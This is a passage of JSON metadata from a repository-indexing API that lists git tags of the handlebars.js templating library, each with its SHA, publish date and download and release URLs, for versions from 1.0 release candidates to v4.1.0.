s_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.0/manifests"},{"name":"v4.0.13-beta.0","sha":"616f8c6fdb8b4224e5ab742e0ae400cfbc74086f","kind":"tag","published_at":"2019-02-02T20:26:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13-beta.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-beta.0/manifests"},{"name":"v4.0.13-0","sha":"0e56659f7bc9d5060bf791d58fd57c5f9a82ae17","kind":"tag","published_at":"2019-02-02T20:25:22.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13-0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13-0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-0/manifests"},{"name":"v3.0.6","sha":"5a427d2d2b7264a83ca6702fddf63a6c7ba281c4","kind":"tag","published_at":"2019-01-02T09:17:56.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"64254b604b9d7fdf76d40b9c6675326eb4bda42b","kind":"tag","published_at":"2018-12-15T13:16:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"698c8a93a4066937977503d338bcd3b90d5035ca","kind":"tag","published_at":"2018-12-15T12:55:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.4/manifests"},{"name":"v4.0.12","sha":"8d22e6f501dc0720fe0610bb4dab60cae18e7d20","kind":"tag","published_at":"2018-09-04T18:44:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.12","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.12/manifests"},{"name":"v4.0.11","sha":"1e954ddf3c3ec6d2318e1fadc5e03aaf065b2fbd","kind":"tag","published_at":"2017-10-17T20:52:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.11","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.11/manifests"},{"name":"v4.0.10","sha":"670ec6fafbf99986a70074a37f73d41bad60b083","kind":"tag","published_at":"2017-05-21T12:11:27.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.10","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.10/manifests"},{"name":"v4.0.9","sha":"5ec78a8c70ac674f39a8408e04d59bd40340f6fe","kind":"tag","published_at":"2017-05-21T11:39:05.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.9","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.9/manifests"},{"name":"v4.0.8","sha":"fed5818876ec325b2b48a61395fe0089bdda05e8","kind":"commit","published_at":"2017-05-02T20:55:44.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.8/manifests"},{"name":"v4.0.7","sha":"606fa55b0a2fab4b22b810a21fc9ae1fd5fd8430","kind":"tag","published_at":"2017-04-29T20:52:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.7/manifests"},{"name":"tmp-1252-backup","sha":"ee913e28bd34dc6e97f98a99f00b484195f72d6f","kind":"commit","published_at":"2017-01-02T09:13:49.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/tmp-1252-backup","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/tmp-1252-backup","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/tmp-1252-backup","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/tmp-1252-backup/manifests"},{"name":"v4.0.6","sha":"ad3037cf54132fc5f589134d3bef961a5f751973","kind":"commit","published_at":"2016-11-12T18:32:45.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.6/manifests"},{"name":"v4.0.5","sha":"205c61cfb1acdb599bbdfcf2d356641254e09e5c","kind":"tag","published_at":"2015-11-20T05:06:54.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.5/manifests"},{"name":"v4.0.4","sha":"b7c95e9feb9b641af2fe83b23c3341ec624aae80","kind":"tag","published_at":"2015-10-29T06:54:17.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"9365b8290070f34bf797c836aed4335ce6a4094f","kind":"tag","published_at":"2015-09-24T03:41:14.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"a5a3ab01d3659b996234e3fa5a4a32350a145096","kind":"tag","published_at":"2015-09-04T14:13:16.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"c7b28a65dab1f1bb370f258fd65796d74c7b53cb","kind":"tag","published_at":"2015-09-03T02:21:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"bff5fab8f9d42e21950be00dcf1cedf4dc1a565b","kind":"tag","published_at":"2015-09-01T13:19:14.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.0/manifests"},{"name":"v3.0.3","sha":"891f48b7e9c321dd9cbe7a898533eb6b2434b8a0","kind":"tag","published_at":"2015-04-28T19:52:04.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"2f0b86665f6080c065d67182ccfdca2ce6f243fa","kind":"tag","published_at":"2015-04-20T08:11:12.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.2/manifests"},{"name":"v3.0.1","sha":"afe730e0594440dd17fdc43271fc4a7db19327f3","kind":"tag","published_at":"2015-03-24T19:22:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.1/manifests"},{"name":"v3.0.0","sha":"0099e16a01bae4789c3560e2a658fdd7fecc9e12","kind":"tag","published_at":"2015-02-10T06:14:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.0/manifests"},{"name":"v2.0.0","sha":"1eb2b04aa1468059172af16968e28ba3a9c07e6d","kind":"tag","published_at":"2014-09-02T02:28:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta.1","sha":"cee52ea68f85baf6812cbc6d303595a88b4ea4f8","kind":"tag","published_at":"2014-08-26T23:32:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-beta.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-beta.1/manifests"},{"name":"v2.0.0-alpha.4","sha":"efad61b1b72a487c087f57ba85287f5682e57280","kind":"tag","published_at":"2014-05-20T04:15:51.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.4/manifests"},{"name":"v2.0.0-alpha.3","sha":"f419838362ad6f3a6f10179bcd7ca683d527e030","kind":"tag","published_at":"2014-05-20T03:29:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.3/manifests"},{"name":"v2.0.0-alpha.2","sha":"04c312649b0b9c61a245c4928f230935e9b8dd23","kind":"tag","published_at":"2014-03-06T07:26:26.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.2/manifests"},{"name":"v2.0.0-alpha.1","sha":"a5ff1f3d22178b3889983be29b31b850a4528719","kind":"tag","published_at":"2014-02-19T23:49:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.1/manifests"},{"name":"v1.3.0","sha":"0c6829f8af189622afd726bb72c195b5323bd6f9","kind":"tag","published_at":"2014-01-02T04:10:31.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.3.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"1c0614bd88b835b7cdfe1fb7f39650c18f645763","kind":"tag","published_at":"2013-12-26T22:25:42.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.2.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"096b8ccd2e376d621fd281e08d557a4632188aaa","kind":"tag","published_at":"2013-12-24T03:39:46.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.2.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.0/manifests"},{"name":"v1.1.2","sha":"47d13cb23c968ada3878b8bacf2813fb01758475","kind":"tag","published_at":"2013-11-06T00:10:06.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"09cdc19a21cd15059f1982f533bc65e2daae904d","kind":"tag","published_at":"2013-11-04T16:48:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"c53e95414f4e74bf6dfb2379a6b9b2468b8fcb31","kind":"tag","published_at":"2013-11-04T05:00:42.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.0/manifests"},{"name":"1.0.0","sha":"2a073e0993b40b81fbef82f681bb1dd171f2233b","kind":"tag","published_at":"2013-05-31T18:17:56.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0/manifests"},{"name":"v1.0.12","sha":"2a073e0993b40b81fbef82f681bb1dd171f2233b","kind":"tag","published_at":"2013-05-31T18:16:53.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.12","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.12/manifests"},{"name":"v1.0.11","sha":"4cf0410b7cc3e06f09b98bbc42a3d2df8e561eba","kind":"tag","published_at":"2013-05-14T04:09:21.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.11","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.11/manifests"},{"name":"1.0.0-rc.4","sha":"4cf0410b7cc3e06f09b98bbc42a3d2df8e561eba","kind":"commit","published_at":"2013-05-14T04:09:21.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0-rc.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.4/manifests"},{"name":"v1.0.7","sha":"b5074a88ec17917309f5482de004076f3f676ad1","kind":"tag","published_at":"2013-05-10T04:51:50.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.7/manifests"},{"name":"v1.0.10","sha":"948231a31d7d6786f1ea0a293a378b20928f6f2b","kind":"tag","published_at":"2013-02-27T13:52:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.10","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.10/manifests"},{"name":"v1.0.9","sha":"b74711e63b7bab7971cb1267f7f0bd9a60b525d7","kind":"tag","published_at":"2013-02-16T01:43:52.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.9","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.9/manifests"},{"name":"1.0.0-rc.3","sha":"bc8214cb7cb4b04180f4df33439ac61a92e1123f","kind":"commit","published_at":"2013-02-15T05:58:20.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0-rc.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.3/manifests"},{"name":"v1.0.8","sha":"5ac29dcb50cea15bee830304e391afd7375d56aa","kind":"tag","published_at":"2013-01-19T08:12:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.8/manifests"},{"name":"1.0.rc.2","sha":"9453c6d9d23f05c596123560ff9b5923e4eed954","kind":"commit","published_at":"2013-01-19T01:13:40.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.rc.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.2/manifests"},{"name":"1.0.rc.1","sha":"ce74c36118ffed1779889d97e6a2a1028ae61510","kind":"commit","published_at":"2012-09-16T04:11:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.rc.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G